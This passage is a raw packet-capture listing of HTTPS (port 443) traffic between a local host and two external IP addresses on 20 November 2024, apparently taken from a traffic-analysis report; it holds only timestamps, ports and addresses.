                                                                                                            Nov 20, 2024 16:57:49.330712080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.330765963 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.330777884 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.337326050 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.337384939 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.337394953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.342225075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.342273951 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.342284918 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.347409010 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.347465038 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.347474098 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.353996992 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.354079962 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.354093075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.467509985 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.467587948 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.467602968 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470644951 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470653057 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470681906 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470696926 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.470705986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470746040 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.475193024 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.475200891 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.475236893 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.478770971 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.478777885 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.478822947 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.478828907 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482271910 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482319117 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.482319117 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482342005 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482405901 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.486835957 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.486843109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.486900091 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.486906052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.490711927 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.490783930 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.490789890 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.495084047 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.495134115 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.495140076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.499166012 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.499219894 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.499226093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.501888037 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.501939058 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.501945972 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.505932093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.505985022 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.505990982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.509107113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.509165049 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.509171009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.513525963 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.513581991 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.513586998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.516937971 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.516993999 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.516999960 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.521364927 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.521409988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.521415949 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.524765968 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.524816036 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.524821997 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.669075966 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.669161081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.669179916 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672384977 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672393084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672446012 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.672450066 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672472000 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672498941 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.675697088 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675704956 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675741911 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675757885 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.675766945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675775051 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.680135012 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.680141926 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.680207968 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.680227041 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683568954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683607101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683624029 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.683640003 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683813095 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.686971903 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.686980009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.687045097 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.687052965 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.691278934 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.691332102 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.691339016 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.694744110 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.694808006 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.694816113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.698065042 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.698143959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.698151112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.702424049 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.702526093 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.702538013 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.706342936 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.706430912 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.706439018 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.709743023 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.709824085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.709832907 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.713180065 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.713246107 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.713253021 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.717472076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.717525959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.717533112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.720936060 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.720997095 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.721004009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.724256039 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.724327087 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.724334002 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.800909996 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.801001072 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.803049088 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.803059101 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.807924986 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.807936907 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.870343924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.870440006 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.870455980 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874008894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874022961 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874069929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.874072075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874109983 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878143072 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878155947 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878180981 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878196955 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.878205061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878556967 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.881442070 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.881454945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.881500959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.881510019 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884917974 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884934902 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884993076 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.885001898 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889261007 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889271021 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889317989 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.889326096 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892770052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892818928 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892822027 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.892841101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.893595934 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.896045923 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.896055937 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.896100998 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.896109104 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.900362015 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.900461912 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.900494099 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.903789043 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.903844118 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.903865099 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.907597065 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.907687902 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.907704115 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.914216042 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.914285898 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.914307117 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.918375015 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.918451071 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.918472052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.921714067 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.921767950 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.921776056 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.925502062 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.925559998 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.925570011 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.929495096 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.929549932 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.929558039 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.119743109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.119910955 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.119944096 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.124639988 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.124655008 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.124705076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.124741077 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.124754906 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.124789953 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.126579046 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.126595020 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.126626968 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.126632929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.126672029 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.130851984 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.130867958 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.130907059 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.130912066 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.130933046 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.130949020 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.132580042 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.134299994 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.134315014 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.134386063 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.134397030 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.138787985 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.138863087 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.138870001 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.142128944 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.142194986 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.142203093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.145642042 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.145705938 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.145714045 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.149800062 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.149867058 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.149876118 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.153325081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.158588886 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.158678055 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.158687115 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.160429955 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.160490036 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.160496950 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.163089037 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.163760900 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.163832903 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.163840055 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.168171883 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.168236017 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.168242931 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.171740055 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.171808958 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.171816111 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.175381899 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.175451994 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.175458908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.179347038 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.179419041 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.179428101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.321046114 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.321244001 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.321275949 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.325126886 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.325144053 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.325191021 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.325203896 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.325227976 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.325586081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.328707933 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.328726053 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.328763962 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.328771114 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.328814983 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.331923008 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.331938982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.331995010 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.332006931 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.332273960 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.336301088 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.336317062 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.336358070 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.336364985 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.338339090 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.338428974 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.338505983 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:50.339958906 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.340038061 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.340046883 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.342518091 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:50.342539072 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.344125032 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.344185114 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.344192982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.346851110 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.347393036 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.347464085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.347470999 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.350891113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.350970984 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.350977898 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.351641893 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.355149031 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.355217934 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.355225086 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.357980967 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.358047962 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.358056068 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.362497091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.362570047 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.362580061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.365870953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.365935087 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.365942001 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.370315075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.370383978 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.370393038 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.373619080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.373693943 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.373708010 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.374403000 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.377091885 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.377154112 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.377161980 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.522344112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.522464037 CET49168443192.168.2.22142.215.209.78
